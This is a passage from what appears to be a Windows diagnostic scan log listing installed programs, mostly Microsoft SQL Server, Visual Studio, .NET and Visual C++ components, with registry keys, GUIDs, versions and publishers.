Intellisense Lang Pack Mobile Extension SDK 10.0.14393.0 (HKLM-x32\...\{26D23C60-AC47-46E5-8EDF-D19F41CAB666}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
Itibiti RTC (HKLM-x32\...\{730E03E4-350E-48E5-9D3E-4329903D454D}) (Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
Kits Configuration Installer (HKLM-x32\...\{76825BA0-C536-C284-BAA1-9DB7A2D30D54}) (Version: 10.1.14393.33 - Microsoft) Hidden
Lagarith lossless video codec (Remove Only) (HKLM\...\LAGARITH) (Version:  - )
Metric Collection SDK 35 (HKLM-x32\...\{C2B5B5B0-2545-4E94-B4BA-548D4BF0B196}) (Version: 1.2.0006.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5 SDK (HKLM-x32\...\{4AE57014-05C4-4864-A13D-86517A7E1BA4}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM-x32\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM-x32\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM-x32\...\{034547E9-D8FA-49E7-8B9C-4C9861FB9146}) (Version: 4.6.00127 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft AS OLE DB Provider for SQL Server 2014 (HKLM\...\{B18D21B6-0056-4E35-896A-339E84D86897}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Help Viewer 2.0 (HKLM-x32\...\Microsoft Help Viewer 2.0) (Version: 2.0.50727 - Microsoft Corporation)
Microsoft Help Viewer 2.1 (HKLM-x32\...\Microsoft Help Viewer 2.1) (Version: 2.1.21005 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft ODBC Driver 11 for SQL Server (HKLM\...\{A106FA6F-E94C-44C9-8A0F-C34BD82C9FE6}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.6213.1000 - Microsoft Corporation)
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.7167.2060 - Microsoft Corporation)
Microsoft Office 365 - es-es (HKLM\...\O365HomePremRetail - es-es) (Version: 16.0.7167.2060 - Microsoft Corporation)
Microsoft Office Access database engine 2007 (English) (HKLM-x32\...\{90120000-00D1-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft OneDrive (HKCU\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Press Training Kit Exam Prep Suite 70-448 (HKLM-x32\...\{81FD9F17-C621-4609-A1A6-F8CF39248065}) (Version: 1.0.0 - MeasureUp)
Microsoft Press Training Kit Exam Prep Suite 70-461 (HKLM-x32\...\{7EA6E951-18B7-4EDA-9B2A-5389DA4CB7A3}) (Version: 1.0.0 - MeasureUp)
Microsoft Report Viewer 2014 Runtime (HKLM-x32\...\{327E9C0D-1687-414F-923E-F5979E549548}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{83F2B8F4-5CF3-4BE9-9772-9543EAE4AC5F}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{6292D514-17A4-403F-98F9-E150F10C043D}) (Version: 10.3.5500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM-x32\...\{8F72E2D4-1E48-4534-8DB8-1E8E012899C6}) (Version: 10.3.5500.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Command Line Utilities  (HKLM\...\{9D573E71-1077-4C7E-B4DB-4E22A5D2B48B}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects  (HKLM-x32\...\{2F7DBBE6-8EBC-495C-9041-46A772F4E311}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{E2D10175-7411-4EA5-8E32-FA21262B435D}) (Version: 11.2.5592.0 - Microsoft Corporation)
Microsoft SQL Server 2014 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2014) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2014 (HKLM-x32\...\Microsoft SQL Server SQLServer2014) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2014 Express LocalDB  (HKLM\...\{AB8DE9BA-19E1-446A-BCFA-6B3DA9751E21}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (HKLM-x32\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (x64) (HKLM\...\{1F9EB3B6-AED7-4AA7-B8F1-8E314B74B2A5}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Policies  (HKLM-x32\...\{1C30FE7E-8A8C-4492-89D6-10CB20C3B0EB}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 RS Add-in for SharePoint  (HKLM\...\{FCF3BEA6-401C-444E-8910-A1AE3F2EBA1D}) (Version: 12.0.2569.0 - Microsoft Corporation)
Microsoft SQL Server 2014 Setup (English) (HKLM\...\{92FBD63F-918C-4465-A283-957B15042D80}) (Version: 12.0.2569.0 - Microsoft Corporation)
Microsoft SQL Server 2014 Setup (English) (HKLM-x32\...\{B16DC92B-0579-4DE5-8ADA-2C1A657A1248}) (Version: 12.0.2569.0 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL Compiler Service  (HKLM\...\{E76CDA08-0F96-44FD-A0FD-C07F6CAF19E0}) (Version: 12.0.2569.0 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom  (HKLM\...\{2C8240B9-2142-4A0E-9678-7F3C678E34C6}) (Version: 12.0.2569.0 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service  (HKLM\...\{7FE9A69F-6D91-4E2E-86B5-E2EB27AE6041}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service  (HKLM-x32\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB  (HKLM\...\{E359515A-92E6-4FA3-A2C9-E1BA02D8DE6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (HKLM-x32\...\{0F1C8E2F-199A-4946-B3BF-0906DACFD032}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (x64) (HKLM\...\{20EA85AA-2A1D-4F11-B09F-4BA2BF3C8989}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL Language Service  (HKLM-x32\...\{8BFDE775-C5B8-46DB-84EF-43FFC8A2E8AD}) (Version: 13.0.14500.10 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL ScriptDom  (HKLM\...\{D091DE8C-EA0F-49AF-8DE3-BD6C79737C6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 ENU (HKLM\...\{78909610-D229-459C-A936-25D92283D3FD}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Data-Tier Application Framework (x64) (HKLM\...\{8EEC46D2-8208-4799-8328-2AA00F96AB8A}) (Version: 12.0.1294.0 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{C3F6F200-6D7B-4879-B9EE-700C0CE1FCDA}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (HKLM-x32\...\{070C38AC-05CE-43DF-9A20-141332F6AB2B}) (Version: 11.1.3366.16 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{CCA90A36-FA50-42CF-BA7D-44AD6EC27F10}) (Version: 12.0.2569.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{718FFB65-F6E4-4D62-861F-ED10ED32C936}) (Version: 12.0.2402.11 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM\...\{96EB5054-C775-4BEF-B7B9-AA96A295EDCD}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM-x32\...\{84C23ECA-FE4D-494F-9247-3EBAD57E7F0C}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974 (HKLM-x32\...\{B7E38540-E355-3503-AFD7-635B2F2F76E1}) (Version: 9.0.30729.4974 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Shell (Isolated) - ENU (HKLM-x32\...\{D64B6984-242F-32BC-B008-752806E5FC44}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2012 Shell (Integrated) (HKLM-x32\...\{55b160d2-8221-45fd-ab30-4388c69c0f3b}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual Studio 2012 Shell (Isolated) (HKLM-x32\...\{d2e0df0f-bf0a-4a89-9530-ebf93842c393}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual Studio 2013 Shell (Integrated) (HKLM-x32\...\{246c9aa4-e96d-476e-a3f4-789b455c7478}) (Version: 12.0.21005.13 - Microsoft Corporation)
Microsoft Visual Studio 2013 Shell (Isolated) (HKLM-x32\...\{dd77c2ff-db69-44f7-9e5c-63aa540dfe07}) (Version: 12.0.21005.13 - Microsoft Corporation)
Microsoft Visual Studio Express 2015 for Windows Desktop - ENU (HKLM-x32\...\{ad32eacb-d66f-472d-9af5-11278d461b28}) (Version: 14.0.23107.178 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2012 (HKLM-x32\...\{e20d88d6-6150-4602-b4ef-49e138467d4d}) (Version: 11.0.51108 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2012 Language Support (HKLM-x32\...\{44774b10-3e2b-443c-899b-56c46b370aa7}) (Version: 11.0.50727.0 - Microsoft Corporation)
Microsoft VSS Writer for SQL Server 2014 (HKLM\...\{366CD715-2FF4-40B4-A8B4-A05E5D21A945}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{03CC9D58-B132-4CC0-A521-4F3660AA43C7}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{701FE1BC-834A-4857-AF62-6EBA50CFBC78}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{8E6E8CBB-8E58-493C-943F-4664F5F2FEDB}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{A17946CA-18E5-4CF0-8D55-A56D804718F8}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{AE8044B5-FCA3-4EBE-AC78-0FB3A6E8DC76}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 51.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 en-US)) (Version: 51.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1.6234 - Mozilla)
MSBuild/NuGet Integration 14.0 (x86) (HKLM-x32\...\{128C1654-3B9E-4959-8BFB-CE6F09C0A01D}) (Version: 14.0.25420 - Microsoft Corporation) Hidden
MyBitCast 2.0 (HKLM-x32\...\MyBitCast) (Version: 2.0 - ASUS)
MyFreeCodec (HKCU\...\MyFreeCodec) (Version:  - )
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.7167.2060 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.7167.2060 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.7167.2060 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0C0A-0000-0000000FF1CE}) (Version: 16.0.7167.2060 - Microsoft Corporation) Hidden
Online Plug-in (HKLM-x32\...\{F390D923-76F1-458E-8218-8C0C156CDCFD}) (Version: 14.1.0.0 - Citrix Systems, Inc.) Hidden
Oracle VM VirtualBox 5.1.6 (HKLM\...\{EEDDD7E2-A7A2-4FA9-8C32-ADB29A5096FF}) (Version: 5.1.6 - Oracle Corporation)
Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 Design-Time - PTB (HKLM-x32\...\{75CAD500-A544-35A4-A741-C40F78D88966}) (Version: 11.0.51108 - Microsoft Corporation) Hidden
Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x64 Hosting Support - PTB (HKLM\...\{E237254B-36A1-3D27-815E-B37C13BE0796}) (Version: 11.0.51108 - Microsoft Corporation) Hidden
Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support - PTB (HKLM-x32\...\{03077B58-6ACF-32CA-B42A-EAA458C295A1}) (Version: 11.0.51108 - Microsoft Corporation) Hidden
Prerequisites for SSDT  (HKLM-x32\...\{21373064-AD95-48DB-A32E-0D9E08EF7355}) (Version: 12.0.2000.8 - Microsoft Corporation)
Prerequisites for SSDT  (HKLM-x32\...\{B7E94916-7AE6-4F7F-A377-7A410A42BA19}) (Version: 13.0.1601.5 - Microsoft Corporation)
Product Improvement Study for HP Deskjet 4640 series (HKLM\...\{D4AE800D-93CD-4F38-8897-ED2FCF6FF8F3}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.224 - Qualcomm Atheros Communications)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
Raccolta foto (HKLM-x32\...\{D04EBB49-C985-4A38-8695-62000861293A}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.7.1025.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.9200.27030 - Realtek Semiconductor Corp.)
Roslyn Language Services - x86 (HKLM-x32\...\{6970C7E1-F99D-388D-8903-DF8FCE677FED}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
Roslyn Language Services - x86 (HKLM-x32\...\{6C1985E7-E1C5-3A95-86EF-2C62465F15C3}) (Version: 14.0.23107 - Microsoft Corporation) Hidden
Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.3.15045.4 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.3.15045.4 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (HKLM-x32\...\{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15041.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15041.2 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.59.0 - Samsung Electronics Co., Ltd.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SQL Server 2014 Analysis Services (HKLM\...\{7719CC19-87C5-4CCC-AF97-13AB9918828C}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Analysis Services (HKLM\...\{A0BC3D94-FB5E-40E3-9881-3B308CC8346B}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Client Tools (HKLM\...\{2BA1811B-44C0-4C50-8C5A-CE68AB25ED71}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Client Tools (HKLM\...\{B5ECFA5C-AC4F-45A4-A12E-A76ABDD9CCBA}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Common Files (HKLM\...\{BD1CD96B-FE4B-4EAE-83D4-6EF55AB5779C}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Common Files (HKLM\...\{F7012F84-80F5-4C25-852E-B1BA03276FE6}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Common Files (HKLM-x32\...\{BFB3B874-8033-4F5E-BE47-0AED2541E57C}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Common Files (HKLM-x32\...\{F78A23CD-E9A0-46E3-88E2-CF2CC93AE7BA}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Data quality client (HKLM\...\{1B61E3E0-7021-47ED-8733-927A31300AE4}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Data quality client (HKLM\...\{DCE60088-65B7-4873-957A-08017D343E9A}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Data quality service (HKLM\...\{69C59171-F1C0-4013-BDF7-01D98B51263E}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Data quality service (HKLM\...\{958AE70F-496E-454B-932E-B218F9074AF0}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Data Tools - BI for Visual Studio 2013 (HKLM-x32\...\{FC6997B5-E23C-49AD-B9BF-BD0B7F4D8BA0}) (Version: 12.0.2430.0 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Services (HKLM\...\{17531BCD-C627-46A2-9F1E-7CC920E0E94A}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Services (HKLM\...\{5082A9F3-AEE5-4639-9BA7-C19661BA7331}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Shared (HKLM\...\{ACC530B8-B6B4-40D6-B59B-152468CF47D0}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Shared (HKLM\...\{D1B847A9-B06B-4264-9EF0-78E6E1571E65}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Distributed Replay (HKLM\...\{2D77A365-F019-4EED-BA58-6389CFD73C9D}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Distributed Replay (HKLM\...\{357D53BA-8B5D-4E72-9636-A82E0B1A72D4}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Distributed Replay (HKLM\...\{3D327420-2E9F-4F56-8B15-C2FE5ADE85BF}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Distributed Replay (HKLM\...\{B5D457CD-3E1A-4D6C-8D16-6030E88DAF35}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Documentation Components (HKLM\...\{1D01EDF6-7E93-4FEE-AA09-C5669511100C}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Documentation Components (HKLM\...\{5EACF47D-EB70-4FE0-83DE-9FD9693C24B9}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Documentation Components (HKLM\...\{832D6A7D-13F7-42CB-9AC6-5859800269AE}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Full text search (HKLM\...\{B40B7A25-308B-4650-8B42-E51710CDD4D9}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Integration Services (HKLM\...\{0FB14E21-7A42-4CD0-8D5C-028B2ACD29E6}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Integration Services (HKLM\...\{327B1B40-2434-4DC5-9D4D-B9B24D4B2EDE}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Management Studio (HKLM\...\{75A54138-3B98-4705-92E4-F619825B121F}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Management Studio (HKLM\...\{839EF29A-3055-43DC-ADCE-8E84893798D5}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Master Data Services (HKLM\...\{B0AE7D26-F924-4471-86D8-97286DCFDCFA}) (Version: 12.0.2569.0 - Microsoft Corporation) Hidden
SQL Server 2014 Master Data Services (HKLM\...\{FD0A0EA4-E80A-45C8-A7C1-FE35B5A50C32}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Reporting Services (HKLM\...\{026E123D-2160-46C7-A801-87D27D46835E}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 Reporting Services (HKLM\...\{700C00BA-E947-4B77-8EF1-588DF210E931}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 RS_SharePoint_SharedService (HKLM\...\{50663FF0-DF81-4DDC-BED0-F92E31488301}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 SQL Data Quality Common (HKLM\...\{2D95D8C0-0DC4-44A6-A729-1E2388D2C03E}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server 2014 SQL Data Quality Common (HKLM-x32\...\{1DB4F090-6E80-4DC8-9844-850316780073}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
SQL Server Browser for SQL Server 2014 (HKLM-x32\...\{3204DE95-97D2-4261-A286-98A262E171D4}) (Version: 12.0.2000.8 - Microsoft Corporation)
Sql Server Customer Experience Improvement Program (HKLM\...\{6476DB81-F263-4C04-8574-AAD31136C304}) (Version: 12.0.2000.8 - Microsoft Corporation) Hidden
Team Explorer for Microsoft Visual Studio 2015 Update 3.1 (HKLM-x32\...\{7A95671A-759E-3B83-B763-4289D1D24D73}) (Version: 14.102.25619 - Microsoft) Hidden
Test Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{9EABBFE1-7EED-47D9-8FB8-21D7E4808057}) (Version: 14.0.23107 - Microsoft Corporation) Hidden
TK448 (HKLM-x32\...\{501AB5E8-5244-44BE-AC88-47FF3A8903A3}) (Version: 2.00.10 - Microsoft Press)
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.51a - Ghisler Software GmbH)
TypeScript Power Tool (HKLM-x32\...\{465ACA24-B8D6-4FEC-A42D-9EFCB92CD560}) (Version: 1.8.34.0 - Microsoft Corporation) Hidden
